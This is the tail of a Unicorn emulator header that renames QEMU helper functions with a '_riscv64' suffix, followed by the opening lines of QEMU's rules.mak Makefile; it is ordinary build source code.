#define helper_atomic_fetch_andq_le_mmu helper_atomic_fetch_andq_le_mmu_riscv64
#define helper_atomic_fetch_orq_le_mmu helper_atomic_fetch_orq_le_mmu_riscv64
#define helper_atomic_fetch_xorq_le_mmu helper_atomic_fetch_xorq_le_mmu_riscv64
#define helper_atomic_add_fetchq_le_mmu helper_atomic_add_fetchq_le_mmu_riscv64
#define helper_atomic_and_fetchq_le_mmu helper_atomic_and_fetchq_le_mmu_riscv64
#define helper_atomic_or_fetchq_le_mmu helper_atomic_or_fetchq_le_mmu_riscv64
#define helper_atomic_xor_fetchq_le_mmu helper_atomic_xor_fetchq_le_mmu_riscv64
#define helper_atomic_fetch_sminq_le_mmu helper_atomic_fetch_sminq_le_mmu_riscv64
#define helper_atomic_fetch_uminq_le_mmu helper_atomic_fetch_uminq_le_mmu_riscv64
#define helper_atomic_fetch_smaxq_le_mmu helper_atomic_fetch_smaxq_le_mmu_riscv64
#define helper_atomic_fetch_umaxq_le_mmu helper_atomic_fetch_umaxq_le_mmu_riscv64
#define helper_atomic_smin_fetchq_le_mmu helper_atomic_smin_fetchq_le_mmu_riscv64
#define helper_atomic_umin_fetchq_le_mmu helper_atomic_umin_fetchq_le_mmu_riscv64
#define helper_atomic_smax_fetchq_le_mmu helper_atomic_smax_fetchq_le_mmu_riscv64
#define helper_atomic_umax_fetchq_le_mmu helper_atomic_umax_fetchq_le_mmu_riscv64
#define helper_atomic_cmpxchgq_be_mmu helper_atomic_cmpxchgq_be_mmu_riscv64
#define helper_atomic_xchgq_be_mmu helper_atomic_xchgq_be_mmu_riscv64
#define helper_atomic_fetch_andq_be_mmu helper_atomic_fetch_andq_be_mmu_riscv64
#define helper_atomic_fetch_orq_be_mmu helper_atomic_fetch_orq_be_mmu_riscv64
#define helper_atomic_fetch_xorq_be_mmu helper_atomic_fetch_xorq_be_mmu_riscv64
#define helper_atomic_and_fetchq_be_mmu helper_atomic_and_fetchq_be_mmu_riscv64
#define helper_atomic_or_fetchq_be_mmu helper_atomic_or_fetchq_be_mmu_riscv64
#define helper_atomic_xor_fetchq_be_mmu helper_atomic_xor_fetchq_be_mmu_riscv64
#define helper_atomic_fetch_sminq_be_mmu helper_atomic_fetch_sminq_be_mmu_riscv64
#define helper_atomic_fetch_uminq_be_mmu helper_atomic_fetch_uminq_be_mmu_riscv64
#define helper_atomic_fetch_smaxq_be_mmu helper_atomic_fetch_smaxq_be_mmu_riscv64
#define helper_atomic_fetch_umaxq_be_mmu helper_atomic_fetch_umaxq_be_mmu_riscv64
#define helper_atomic_smin_fetchq_be_mmu helper_atomic_smin_fetchq_be_mmu_riscv64
#define helper_atomic_umin_fetchq_be_mmu helper_atomic_umin_fetchq_be_mmu_riscv64
#define helper_atomic_smax_fetchq_be_mmu helper_atomic_smax_fetchq_be_mmu_riscv64
#define helper_atomic_umax_fetchq_be_mmu helper_atomic_umax_fetchq_be_mmu_riscv64
#define helper_atomic_fetch_addq_be_mmu helper_atomic_fetch_addq_be_mmu_riscv64
#define helper_atomic_add_fetchq_be_mmu helper_atomic_add_fetchq_be_mmu_riscv64
#define helper_atomic_cmpxchgb helper_atomic_cmpxchgb_riscv64
#define helper_atomic_xchgb helper_atomic_xchgb_riscv64
#define helper_atomic_fetch_addb helper_atomic_fetch_addb_riscv64
#define helper_atomic_fetch_andb helper_atomic_fetch_andb_riscv64
#define helper_atomic_fetch_orb helper_atomic_fetch_orb_riscv64
#define helper_atomic_fetch_xorb helper_atomic_fetch_xorb_riscv64
#define helper_atomic_add_fetchb helper_atomic_add_fetchb_riscv64
#define helper_atomic_and_fetchb helper_atomic_and_fetchb_riscv64
#define helper_atomic_or_fetchb helper_atomic_or_fetchb_riscv64
#define helper_atomic_xor_fetchb helper_atomic_xor_fetchb_riscv64
#define helper_atomic_fetch_sminb helper_atomic_fetch_sminb_riscv64
#define helper_atomic_fetch_uminb helper_atomic_fetch_uminb_riscv64
#define helper_atomic_fetch_smaxb helper_atomic_fetch_smaxb_riscv64
#define helper_atomic_fetch_umaxb helper_atomic_fetch_umaxb_riscv64
#define helper_atomic_smin_fetchb helper_atomic_smin_fetchb_riscv64
#define helper_atomic_umin_fetchb helper_atomic_umin_fetchb_riscv64
#define helper_atomic_smax_fetchb helper_atomic_smax_fetchb_riscv64
#define helper_atomic_umax_fetchb helper_atomic_umax_fetchb_riscv64
#define helper_atomic_cmpxchgw_le helper_atomic_cmpxchgw_le_riscv64
#define helper_atomic_xchgw_le helper_atomic_xchgw_le_riscv64
#define helper_atomic_fetch_addw_le helper_atomic_fetch_addw_le_riscv64
#define helper_atomic_fetch_andw_le helper_atomic_fetch_andw_le_riscv64
#define helper_atomic_fetch_orw_le helper_atomic_fetch_orw_le_riscv64
#define helper_atomic_fetch_xorw_le helper_atomic_fetch_xorw_le_riscv64
#define helper_atomic_add_fetchw_le helper_atomic_add_fetchw_le_riscv64
#define helper_atomic_and_fetchw_le helper_atomic_and_fetchw_le_riscv64
#define helper_atomic_or_fetchw_le helper_atomic_or_fetchw_le_riscv64
#define helper_atomic_xor_fetchw_le helper_atomic_xor_fetchw_le_riscv64
#define helper_atomic_fetch_sminw_le helper_atomic_fetch_sminw_le_riscv64
#define helper_atomic_fetch_uminw_le helper_atomic_fetch_uminw_le_riscv64
#define helper_atomic_fetch_smaxw_le helper_atomic_fetch_smaxw_le_riscv64
#define helper_atomic_fetch_umaxw_le helper_atomic_fetch_umaxw_le_riscv64
#define helper_atomic_smin_fetchw_le helper_atomic_smin_fetchw_le_riscv64
#define helper_atomic_umin_fetchw_le helper_atomic_umin_fetchw_le_riscv64
#define helper_atomic_smax_fetchw_le helper_atomic_smax_fetchw_le_riscv64
#define helper_atomic_umax_fetchw_le helper_atomic_umax_fetchw_le_riscv64
#define helper_atomic_cmpxchgw_be helper_atomic_cmpxchgw_be_riscv64
#define helper_atomic_xchgw_be helper_atomic_xchgw_be_riscv64
#define helper_atomic_fetch_andw_be helper_atomic_fetch_andw_be_riscv64
#define helper_atomic_fetch_orw_be helper_atomic_fetch_orw_be_riscv64
#define helper_atomic_fetch_xorw_be helper_atomic_fetch_xorw_be_riscv64
#define helper_atomic_and_fetchw_be helper_atomic_and_fetchw_be_riscv64
#define helper_atomic_or_fetchw_be helper_atomic_or_fetchw_be_riscv64
#define helper_atomic_xor_fetchw_be helper_atomic_xor_fetchw_be_riscv64
#define helper_atomic_fetch_sminw_be helper_atomic_fetch_sminw_be_riscv64
#define helper_atomic_fetch_uminw_be helper_atomic_fetch_uminw_be_riscv64
#define helper_atomic_fetch_smaxw_be helper_atomic_fetch_smaxw_be_riscv64
#define helper_atomic_fetch_umaxw_be helper_atomic_fetch_umaxw_be_riscv64
#define helper_atomic_smin_fetchw_be helper_atomic_smin_fetchw_be_riscv64
#define helper_atomic_umin_fetchw_be helper_atomic_umin_fetchw_be_riscv64
#define helper_atomic_smax_fetchw_be helper_atomic_smax_fetchw_be_riscv64
#define helper_atomic_umax_fetchw_be helper_atomic_umax_fetchw_be_riscv64
#define helper_atomic_fetch_addw_be helper_atomic_fetch_addw_be_riscv64
#define helper_atomic_add_fetchw_be helper_atomic_add_fetchw_be_riscv64
#define helper_atomic_cmpxchgl_le helper_atomic_cmpxchgl_le_riscv64
#define helper_atomic_xchgl_le helper_atomic_xchgl_le_riscv64
#define helper_atomic_fetch_addl_le helper_atomic_fetch_addl_le_riscv64
#define helper_atomic_fetch_andl_le helper_atomic_fetch_andl_le_riscv64
#define helper_atomic_fetch_orl_le helper_atomic_fetch_orl_le_riscv64
#define helper_atomic_fetch_xorl_le helper_atomic_fetch_xorl_le_riscv64
#define helper_atomic_add_fetchl_le helper_atomic_add_fetchl_le_riscv64
#define helper_atomic_and_fetchl_le helper_atomic_and_fetchl_le_riscv64
#define helper_atomic_or_fetchl_le helper_atomic_or_fetchl_le_riscv64
#define helper_atomic_xor_fetchl_le helper_atomic_xor_fetchl_le_riscv64
#define helper_atomic_fetch_sminl_le helper_atomic_fetch_sminl_le_riscv64
#define helper_atomic_fetch_uminl_le helper_atomic_fetch_uminl_le_riscv64
#define helper_atomic_fetch_smaxl_le helper_atomic_fetch_smaxl_le_riscv64
#define helper_atomic_fetch_umaxl_le helper_atomic_fetch_umaxl_le_riscv64
#define helper_atomic_smin_fetchl_le helper_atomic_smin_fetchl_le_riscv64
#define helper_atomic_umin_fetchl_le helper_atomic_umin_fetchl_le_riscv64
#define helper_atomic_smax_fetchl_le helper_atomic_smax_fetchl_le_riscv64
#define helper_atomic_umax_fetchl_le helper_atomic_umax_fetchl_le_riscv64
#define helper_atomic_cmpxchgl_be helper_atomic_cmpxchgl_be_riscv64
#define helper_atomic_xchgl_be helper_atomic_xchgl_be_riscv64
#define helper_atomic_fetch_andl_be helper_atomic_fetch_andl_be_riscv64
#define helper_atomic_fetch_orl_be helper_atomic_fetch_orl_be_riscv64
#define helper_atomic_fetch_xorl_be helper_atomic_fetch_xorl_be_riscv64
#define helper_atomic_and_fetchl_be helper_atomic_and_fetchl_be_riscv64
#define helper_atomic_or_fetchl_be helper_atomic_or_fetchl_be_riscv64
#define helper_atomic_xor_fetchl_be helper_atomic_xor_fetchl_be_riscv64
#define helper_atomic_fetch_sminl_be helper_atomic_fetch_sminl_be_riscv64
#define helper_atomic_fetch_uminl_be helper_atomic_fetch_uminl_be_riscv64
#define helper_atomic_fetch_smaxl_be helper_atomic_fetch_smaxl_be_riscv64
#define helper_atomic_fetch_umaxl_be helper_atomic_fetch_umaxl_be_riscv64
#define helper_atomic_smin_fetchl_be helper_atomic_smin_fetchl_be_riscv64
#define helper_atomic_umin_fetchl_be helper_atomic_umin_fetchl_be_riscv64
#define helper_atomic_smax_fetchl_be helper_atomic_smax_fetchl_be_riscv64
#define helper_atomic_umax_fetchl_be helper_atomic_umax_fetchl_be_riscv64
#define helper_atomic_fetch_addl_be helper_atomic_fetch_addl_be_riscv64
#define helper_atomic_add_fetchl_be helper_atomic_add_fetchl_be_riscv64
#define helper_atomic_cmpxchgq_le helper_atomic_cmpxchgq_le_riscv64
#define helper_atomic_xchgq_le helper_atomic_xchgq_le_riscv64
#define helper_atomic_fetch_addq_le helper_atomic_fetch_addq_le_riscv64
#define helper_atomic_fetch_andq_le helper_atomic_fetch_andq_le_riscv64
#define helper_atomic_fetch_orq_le helper_atomic_fetch_orq_le_riscv64
#define helper_atomic_fetch_xorq_le helper_atomic_fetch_xorq_le_riscv64
#define helper_atomic_add_fetchq_le helper_atomic_add_fetchq_le_riscv64
#define helper_atomic_and_fetchq_le helper_atomic_and_fetchq_le_riscv64
#define helper_atomic_or_fetchq_le helper_atomic_or_fetchq_le_riscv64
#define helper_atomic_xor_fetchq_le helper_atomic_xor_fetchq_le_riscv64
#define helper_atomic_fetch_sminq_le helper_atomic_fetch_sminq_le_riscv64
#define helper_atomic_fetch_uminq_le helper_atomic_fetch_uminq_le_riscv64
#define helper_atomic_fetch_smaxq_le helper_atomic_fetch_smaxq_le_riscv64
#define helper_atomic_fetch_umaxq_le helper_atomic_fetch_umaxq_le_riscv64
#define helper_atomic_smin_fetchq_le helper_atomic_smin_fetchq_le_riscv64
#define helper_atomic_umin_fetchq_le helper_atomic_umin_fetchq_le_riscv64
#define helper_atomic_smax_fetchq_le helper_atomic_smax_fetchq_le_riscv64
#define helper_atomic_umax_fetchq_le helper_atomic_umax_fetchq_le_riscv64
#define helper_atomic_cmpxchgq_be helper_atomic_cmpxchgq_be_riscv64
#define helper_atomic_xchgq_be helper_atomic_xchgq_be_riscv64
#define helper_atomic_fetch_andq_be helper_atomic_fetch_andq_be_riscv64
#define helper_atomic_fetch_orq_be helper_atomic_fetch_orq_be_riscv64
#define helper_atomic_fetch_xorq_be helper_atomic_fetch_xorq_be_riscv64
#define helper_atomic_and_fetchq_be helper_atomic_and_fetchq_be_riscv64
#define helper_atomic_or_fetchq_be helper_atomic_or_fetchq_be_riscv64
#define helper_atomic_xor_fetchq_be helper_atomic_xor_fetchq_be_riscv64
#define helper_atomic_fetch_sminq_be helper_atomic_fetch_sminq_be_riscv64
#define helper_atomic_fetch_uminq_be helper_atomic_fetch_uminq_be_riscv64
#define helper_atomic_fetch_smaxq_be helper_atomic_fetch_smaxq_be_riscv64
#define helper_atomic_fetch_umaxq_be helper_atomic_fetch_umaxq_be_riscv64
#define helper_atomic_smin_fetchq_be helper_atomic_smin_fetchq_be_riscv64
#define helper_atomic_umin_fetchq_be helper_atomic_umin_fetchq_be_riscv64
#define helper_atomic_smax_fetchq_be helper_atomic_smax_fetchq_be_riscv64
#define helper_atomic_umax_fetchq_be helper_atomic_umax_fetchq_be_riscv64
#define helper_atomic_fetch_addq_be helper_atomic_fetch_addq_be_riscv64
#define helper_atomic_add_fetchq_be helper_atomic_add_fetchq_be_riscv64
#define cpu_ldub_code cpu_ldub_code_riscv64
#define cpu_lduw_code cpu_lduw_code_riscv64
#define cpu_ldl_code cpu_ldl_code_riscv64
#define cpu_ldq_code cpu_ldq_code_riscv64
#define helper_div_i32 helper_div_i32_riscv64
#define helper_rem_i32 helper_rem_i32_riscv64
#define helper_divu_i32 helper_divu_i32_riscv64
#define helper_remu_i32 helper_remu_i32_riscv64
#define helper_shl_i64 helper_shl_i64_riscv64
#define helper_shr_i64 helper_shr_i64_riscv64
#define helper_sar_i64 helper_sar_i64_riscv64
#define helper_div_i64 helper_div_i64_riscv64
#define helper_rem_i64 helper_rem_i64_riscv64
#define helper_divu_i64 helper_divu_i64_riscv64
#define helper_remu_i64 helper_remu_i64_riscv64
#define helper_muluh_i64 helper_muluh_i64_riscv64
#define helper_mulsh_i64 helper_mulsh_i64_riscv64
#define helper_clz_i32 helper_clz_i32_riscv64
#define helper_ctz_i32 helper_ctz_i32_riscv64
#define helper_clz_i64 helper_clz_i64_riscv64
#define helper_ctz_i64 helper_ctz_i64_riscv64
#define helper_clrsb_i32 helper_clrsb_i32_riscv64
#define helper_clrsb_i64 helper_clrsb_i64_riscv64
#define helper_ctpop_i32 helper_ctpop_i32_riscv64
#define helper_ctpop_i64 helper_ctpop_i64_riscv64
#define helper_lookup_tb_ptr helper_lookup_tb_ptr_riscv64
#define helper_exit_atomic helper_exit_atomic_riscv64
#define helper_gvec_add8 helper_gvec_add8_riscv64
#define helper_gvec_add16 helper_gvec_add16_riscv64
#define helper_gvec_add32 helper_gvec_add32_riscv64
#define helper_gvec_add64 helper_gvec_add64_riscv64
#define helper_gvec_adds8 helper_gvec_adds8_riscv64
#define helper_gvec_adds16 helper_gvec_adds16_riscv64
#define helper_gvec_adds32 helper_gvec_adds32_riscv64
#define helper_gvec_adds64 helper_gvec_adds64_riscv64
#define helper_gvec_sub8 helper_gvec_sub8_riscv64
#define helper_gvec_sub16 helper_gvec_sub16_riscv64
#define helper_gvec_sub32 helper_gvec_sub32_riscv64
#define helper_gvec_sub64 helper_gvec_sub64_riscv64
#define helper_gvec_subs8 helper_gvec_subs8_riscv64
#define helper_gvec_subs16 helper_gvec_subs16_riscv64
#define helper_gvec_subs32 helper_gvec_subs32_riscv64
#define helper_gvec_subs64 helper_gvec_subs64_riscv64
#define helper_gvec_mul8 helper_gvec_mul8_riscv64
#define helper_gvec_mul16 helper_gvec_mul16_riscv64
#define helper_gvec_mul32 helper_gvec_mul32_riscv64
#define helper_gvec_mul64 helper_gvec_mul64_riscv64
#define helper_gvec_muls8 helper_gvec_muls8_riscv64
#define helper_gvec_muls16 helper_gvec_muls16_riscv64
#define helper_gvec_muls32 helper_gvec_muls32_riscv64
#define helper_gvec_muls64 helper_gvec_muls64_riscv64
#define helper_gvec_neg8 helper_gvec_neg8_riscv64
#define helper_gvec_neg16 helper_gvec_neg16_riscv64
#define helper_gvec_neg32 helper_gvec_neg32_riscv64
#define helper_gvec_neg64 helper_gvec_neg64_riscv64
#define helper_gvec_abs8 helper_gvec_abs8_riscv64
#define helper_gvec_abs16 helper_gvec_abs16_riscv64
#define helper_gvec_abs32 helper_gvec_abs32_riscv64
#define helper_gvec_abs64 helper_gvec_abs64_riscv64
#define helper_gvec_mov helper_gvec_mov_riscv64
#define helper_gvec_dup64 helper_gvec_dup64_riscv64
#define helper_gvec_dup32 helper_gvec_dup32_riscv64
#define helper_gvec_dup16 helper_gvec_dup16_riscv64
#define helper_gvec_dup8 helper_gvec_dup8_riscv64
#define helper_gvec_not helper_gvec_not_riscv64
#define helper_gvec_and helper_gvec_and_riscv64
#define helper_gvec_or helper_gvec_or_riscv64
#define helper_gvec_xor helper_gvec_xor_riscv64
#define helper_gvec_andc helper_gvec_andc_riscv64
#define helper_gvec_orc helper_gvec_orc_riscv64
#define helper_gvec_nand helper_gvec_nand_riscv64
#define helper_gvec_nor helper_gvec_nor_riscv64
#define helper_gvec_eqv helper_gvec_eqv_riscv64
#define helper_gvec_ands helper_gvec_ands_riscv64
#define helper_gvec_xors helper_gvec_xors_riscv64
#define helper_gvec_ors helper_gvec_ors_riscv64
#define helper_gvec_shl8i helper_gvec_shl8i_riscv64
#define helper_gvec_shl16i helper_gvec_shl16i_riscv64
#define helper_gvec_shl32i helper_gvec_shl32i_riscv64
#define helper_gvec_shl64i helper_gvec_shl64i_riscv64
#define helper_gvec_shr8i helper_gvec_shr8i_riscv64
#define helper_gvec_shr16i helper_gvec_shr16i_riscv64
#define helper_gvec_shr32i helper_gvec_shr32i_riscv64
#define helper_gvec_shr64i helper_gvec_shr64i_riscv64
#define helper_gvec_sar8i helper_gvec_sar8i_riscv64
#define helper_gvec_sar16i helper_gvec_sar16i_riscv64
#define helper_gvec_sar32i helper_gvec_sar32i_riscv64
#define helper_gvec_sar64i helper_gvec_sar64i_riscv64
#define helper_gvec_shl8v helper_gvec_shl8v_riscv64
#define helper_gvec_shl16v helper_gvec_shl16v_riscv64
#define helper_gvec_shl32v helper_gvec_shl32v_riscv64
#define helper_gvec_shl64v helper_gvec_shl64v_riscv64
#define helper_gvec_shr8v helper_gvec_shr8v_riscv64
#define helper_gvec_shr16v helper_gvec_shr16v_riscv64
#define helper_gvec_shr32v helper_gvec_shr32v_riscv64
#define helper_gvec_shr64v helper_gvec_shr64v_riscv64
#define helper_gvec_sar8v helper_gvec_sar8v_riscv64
#define helper_gvec_sar16v helper_gvec_sar16v_riscv64
#define helper_gvec_sar32v helper_gvec_sar32v_riscv64
#define helper_gvec_sar64v helper_gvec_sar64v_riscv64
#define helper_gvec_eq8 helper_gvec_eq8_riscv64
#define helper_gvec_ne8 helper_gvec_ne8_riscv64
#define helper_gvec_lt8 helper_gvec_lt8_riscv64
#define helper_gvec_le8 helper_gvec_le8_riscv64
#define helper_gvec_ltu8 helper_gvec_ltu8_riscv64
#define helper_gvec_leu8 helper_gvec_leu8_riscv64
#define helper_gvec_eq16 helper_gvec_eq16_riscv64
#define helper_gvec_ne16 helper_gvec_ne16_riscv64
#define helper_gvec_lt16 helper_gvec_lt16_riscv64
#define helper_gvec_le16 helper_gvec_le16_riscv64
#define helper_gvec_ltu16 helper_gvec_ltu16_riscv64
#define helper_gvec_leu16 helper_gvec_leu16_riscv64
#define helper_gvec_eq32 helper_gvec_eq32_riscv64
#define helper_gvec_ne32 helper_gvec_ne32_riscv64
#define helper_gvec_lt32 helper_gvec_lt32_riscv64
#define helper_gvec_le32 helper_gvec_le32_riscv64
#define helper_gvec_ltu32 helper_gvec_ltu32_riscv64
#define helper_gvec_leu32 helper_gvec_leu32_riscv64
#define helper_gvec_eq64 helper_gvec_eq64_riscv64
#define helper_gvec_ne64 helper_gvec_ne64_riscv64
#define helper_gvec_lt64 helper_gvec_lt64_riscv64
#define helper_gvec_le64 helper_gvec_le64_riscv64
#define helper_gvec_ltu64 helper_gvec_ltu64_riscv64
#define helper_gvec_leu64 helper_gvec_leu64_riscv64
#define helper_gvec_ssadd8 helper_gvec_ssadd8_riscv64
#define helper_gvec_ssadd16 helper_gvec_ssadd16_riscv64
#define helper_gvec_ssadd32 helper_gvec_ssadd32_riscv64
#define helper_gvec_ssadd64 helper_gvec_ssadd64_riscv64
#define helper_gvec_sssub8 helper_gvec_sssub8_riscv64
#define helper_gvec_sssub16 helper_gvec_sssub16_riscv64
#define helper_gvec_sssub32 helper_gvec_sssub32_riscv64
#define helper_gvec_sssub64 helper_gvec_sssub64_riscv64
#define helper_gvec_usadd8 helper_gvec_usadd8_riscv64
#define helper_gvec_usadd16 helper_gvec_usadd16_riscv64
#define helper_gvec_usadd32 helper_gvec_usadd32_riscv64
#define helper_gvec_usadd64 helper_gvec_usadd64_riscv64
#define helper_gvec_ussub8 helper_gvec_ussub8_riscv64
#define helper_gvec_ussub16 helper_gvec_ussub16_riscv64
#define helper_gvec_ussub32 helper_gvec_ussub32_riscv64
#define helper_gvec_ussub64 helper_gvec_ussub64_riscv64
#define helper_gvec_smin8 helper_gvec_smin8_riscv64
#define helper_gvec_smin16 helper_gvec_smin16_riscv64
#define helper_gvec_smin32 helper_gvec_smin32_riscv64
#define helper_gvec_smin64 helper_gvec_smin64_riscv64
#define helper_gvec_smax8 helper_gvec_smax8_riscv64
#define helper_gvec_smax16 helper_gvec_smax16_riscv64
#define helper_gvec_smax32 helper_gvec_smax32_riscv64
#define helper_gvec_smax64 helper_gvec_smax64_riscv64
#define helper_gvec_umin8 helper_gvec_umin8_riscv64
#define helper_gvec_umin16 helper_gvec_umin16_riscv64
#define helper_gvec_umin32 helper_gvec_umin32_riscv64
#define helper_gvec_umin64 helper_gvec_umin64_riscv64
#define helper_gvec_umax8 helper_gvec_umax8_riscv64
#define helper_gvec_umax16 helper_gvec_umax16_riscv64
#define helper_gvec_umax32 helper_gvec_umax32_riscv64
#define helper_gvec_umax64 helper_gvec_umax64_riscv64
#define helper_gvec_bitsel helper_gvec_bitsel_riscv64
#define cpu_restore_state cpu_restore_state_riscv64
#define page_collection_lock page_collection_lock_riscv64
#define page_collection_unlock page_collection_unlock_riscv64
#define free_code_gen_buffer free_code_gen_buffer_riscv64
#define tcg_exec_init tcg_exec_init_riscv64
#define tb_cleanup tb_cleanup_riscv64
#define tb_flush tb_flush_riscv64
#define tb_phys_invalidate tb_phys_invalidate_riscv64
#define tb_gen_code tb_gen_code_riscv64
#define tb_exec_lock tb_exec_lock_riscv64
#define tb_exec_unlock tb_exec_unlock_riscv64
#define tb_invalidate_phys_page_range tb_invalidate_phys_page_range_riscv64
#define tb_invalidate_phys_range tb_invalidate_phys_range_riscv64
#define tb_invalidate_phys_page_fast tb_invalidate_phys_page_fast_riscv64
#define tb_check_watchpoint tb_check_watchpoint_riscv64
#define cpu_io_recompile cpu_io_recompile_riscv64
#define tb_flush_jmp_cache tb_flush_jmp_cache_riscv64
#define tcg_flush_softmmu_tlb tcg_flush_softmmu_tlb_riscv64
#define translator_loop_temp_check translator_loop_temp_check_riscv64
#define translator_loop translator_loop_riscv64
#define helper_atomic_cmpxchgo_le_mmu helper_atomic_cmpxchgo_le_mmu_riscv64
#define helper_atomic_cmpxchgo_be_mmu helper_atomic_cmpxchgo_be_mmu_riscv64
#define helper_atomic_ldo_le_mmu helper_atomic_ldo_le_mmu_riscv64
#define helper_atomic_ldo_be_mmu helper_atomic_ldo_be_mmu_riscv64
#define helper_atomic_sto_le_mmu helper_atomic_sto_le_mmu_riscv64
#define helper_atomic_sto_be_mmu helper_atomic_sto_be_mmu_riscv64
#define unassigned_mem_ops unassigned_mem_ops_riscv64
#define floatx80_infinity floatx80_infinity_riscv64
#define dup_const_func dup_const_func_riscv64
#define gen_helper_raise_exception gen_helper_raise_exception_riscv64
#define gen_helper_raise_interrupt gen_helper_raise_interrupt_riscv64
#define gen_helper_vfp_get_fpscr gen_helper_vfp_get_fpscr_riscv64
#define gen_helper_vfp_set_fpscr gen_helper_vfp_set_fpscr_riscv64
#define gen_helper_cpsr_read gen_helper_cpsr_read_riscv64
#define gen_helper_cpsr_write gen_helper_cpsr_write_riscv64
#define tlb_reset_dirty_by_vaddr tlb_reset_dirty_by_vaddr_riscv64
#define riscv_cpu_mmu_index riscv_cpu_mmu_index_riscv64
#define riscv_cpu_exec_interrupt riscv_cpu_exec_interrupt_riscv64
#define riscv_cpu_fp_enabled riscv_cpu_fp_enabled_riscv64
#define riscv_cpu_swap_hypervisor_regs riscv_cpu_swap_hypervisor_regs_riscv64
#define riscv_cpu_virt_enabled riscv_cpu_virt_enabled_riscv64
#define riscv_cpu_set_virt_enabled riscv_cpu_set_virt_enabled_riscv64
#define riscv_cpu_force_hs_excep_enabled riscv_cpu_force_hs_excep_enabled_riscv64
#define riscv_cpu_set_force_hs_excep riscv_cpu_set_force_hs_excep_riscv64
#define riscv_cpu_claim_interrupts riscv_cpu_claim_interrupts_riscv64
#define riscv_cpu_update_mip riscv_cpu_update_mip_riscv64
#define riscv_cpu_set_rdtime_fn riscv_cpu_set_rdtime_fn_riscv64
#define riscv_cpu_set_mode riscv_cpu_set_mode_riscv64
#define riscv_cpu_get_phys_page_debug riscv_cpu_get_phys_page_debug_riscv64
#define riscv_cpu_do_transaction_failed riscv_cpu_do_transaction_failed_riscv64
#define riscv_cpu_do_unaligned_access riscv_cpu_do_unaligned_access_riscv64
#define riscv_cpu_tlb_fill riscv_cpu_tlb_fill_riscv64
#define riscv_cpu_do_interrupt riscv_cpu_do_interrupt_riscv64
#define riscv_get_csr_ops riscv_get_csr_ops_riscv64
#define riscv_set_csr_ops riscv_set_csr_ops_riscv64
#define riscv_csrrw riscv_csrrw_riscv64
#define riscv_csrrw_debug riscv_csrrw_debug_riscv64
#define riscv_cpu_get_fflags riscv_cpu_get_fflags_riscv64
#define riscv_cpu_set_fflags riscv_cpu_set_fflags_riscv64
#define helper_set_rounding_mode helper_set_rounding_mode_riscv64
#define helper_fmadd_s helper_fmadd_s_riscv64
#define helper_fmadd_d helper_fmadd_d_riscv64
#define helper_fmsub_s helper_fmsub_s_riscv64
#define helper_fmsub_d helper_fmsub_d_riscv64
#define helper_fnmsub_s helper_fnmsub_s_riscv64
#define helper_fnmsub_d helper_fnmsub_d_riscv64
#define helper_fnmadd_s helper_fnmadd_s_riscv64
#define helper_fnmadd_d helper_fnmadd_d_riscv64
#define helper_fadd_s helper_fadd_s_riscv64
#define helper_fsub_s helper_fsub_s_riscv64
#define helper_fmul_s helper_fmul_s_riscv64
#define helper_fdiv_s helper_fdiv_s_riscv64
#define helper_fmin_s helper_fmin_s_riscv64
#define helper_fmax_s helper_fmax_s_riscv64
#define helper_fsqrt_s helper_fsqrt_s_riscv64
#define helper_fle_s helper_fle_s_riscv64
#define helper_flt_s helper_flt_s_riscv64
#define helper_feq_s helper_feq_s_riscv64
#define helper_fcvt_w_s helper_fcvt_w_s_riscv64
#define helper_fcvt_wu_s helper_fcvt_wu_s_riscv64
#define helper_fcvt_s_w helper_fcvt_s_w_riscv64
#define helper_fcvt_s_wu helper_fcvt_s_wu_riscv64
#define helper_fclass_s helper_fclass_s_riscv64
#define helper_fadd_d helper_fadd_d_riscv64
#define helper_fsub_d helper_fsub_d_riscv64
#define helper_fmul_d helper_fmul_d_riscv64
#define helper_fdiv_d helper_fdiv_d_riscv64
#define helper_fmin_d helper_fmin_d_riscv64
#define helper_fmax_d helper_fmax_d_riscv64
#define helper_fcvt_s_d helper_fcvt_s_d_riscv64
#define helper_fcvt_d_s helper_fcvt_d_s_riscv64
#define helper_fsqrt_d helper_fsqrt_d_riscv64
#define helper_fle_d helper_fle_d_riscv64
#define helper_flt_d helper_flt_d_riscv64
#define helper_feq_d helper_feq_d_riscv64
#define helper_fcvt_w_d helper_fcvt_w_d_riscv64
#define helper_fcvt_wu_d helper_fcvt_wu_d_riscv64
#define helper_fcvt_d_w helper_fcvt_d_w_riscv64
#define helper_fcvt_d_wu helper_fcvt_d_wu_riscv64
#define helper_fclass_d helper_fclass_d_riscv64
#define riscv_raise_exception riscv_raise_exception_riscv64
#define helper_raise_exception helper_raise_exception_riscv64
#define helper_uc_riscv_exit helper_uc_riscv_exit_riscv64
#define helper_csrrw helper_csrrw_riscv64
#define helper_csrrs helper_csrrs_riscv64
#define helper_csrrc helper_csrrc_riscv64
#define helper_sret helper_sret_riscv64
#define helper_mret helper_mret_riscv64
#define helper_wfi helper_wfi_riscv64
#define helper_tlb_flush helper_tlb_flush_riscv64
#define pmp_hart_has_privs pmp_hart_has_privs_riscv64
#define pmpcfg_csr_write pmpcfg_csr_write_riscv64
#define pmpcfg_csr_read pmpcfg_csr_read_riscv64
#define pmpaddr_csr_write pmpaddr_csr_write_riscv64
#define pmpaddr_csr_read pmpaddr_csr_read_riscv64
#define gen_intermediate_code gen_intermediate_code_riscv64
#define riscv_translate_init riscv_translate_init_riscv64
#define restore_state_to_opc restore_state_to_opc_riscv64
#define cpu_riscv_init cpu_riscv_init_riscv64
#define helper_fcvt_l_s helper_fcvt_l_s_riscv64
#define helper_fcvt_lu_s helper_fcvt_lu_s_riscv64
#define helper_fcvt_s_l helper_fcvt_s_l_riscv64
#define helper_fcvt_s_lu helper_fcvt_s_lu_riscv64
#define helper_fcvt_l_d helper_fcvt_l_d_riscv64
#define helper_fcvt_lu_d helper_fcvt_lu_d_riscv64
#define helper_fcvt_d_l helper_fcvt_d_l_riscv64
#define helper_fcvt_d_lu helper_fcvt_d_lu_riscv64
#define gen_helper_tlb_flush gen_helper_tlb_flush_riscv64
#define riscv_fpr_regnames riscv_fpr_regnames_riscv64
#define riscv_int_regnames riscv_int_regnames_riscv64
#endif
unicorn-2.1.1/qemu/rules.mak

# These are used when we want to do substitutions without confusing Make
NULL  :=
SPACE := $(NULL) #
COMMA := ,

# Don't use implicit rules or variables
# we have explicit rules for everything
MAKEFLAGS += -rR

# Files with these suffixes are final, don't try to generate them
# using implicit rules
%/trace-events:
%.hx:
%.py:
%.objs:
%.d:
%.h:
%.c:
%.cc:
%.cpp:
%.m:
%.mak:
clean-target:

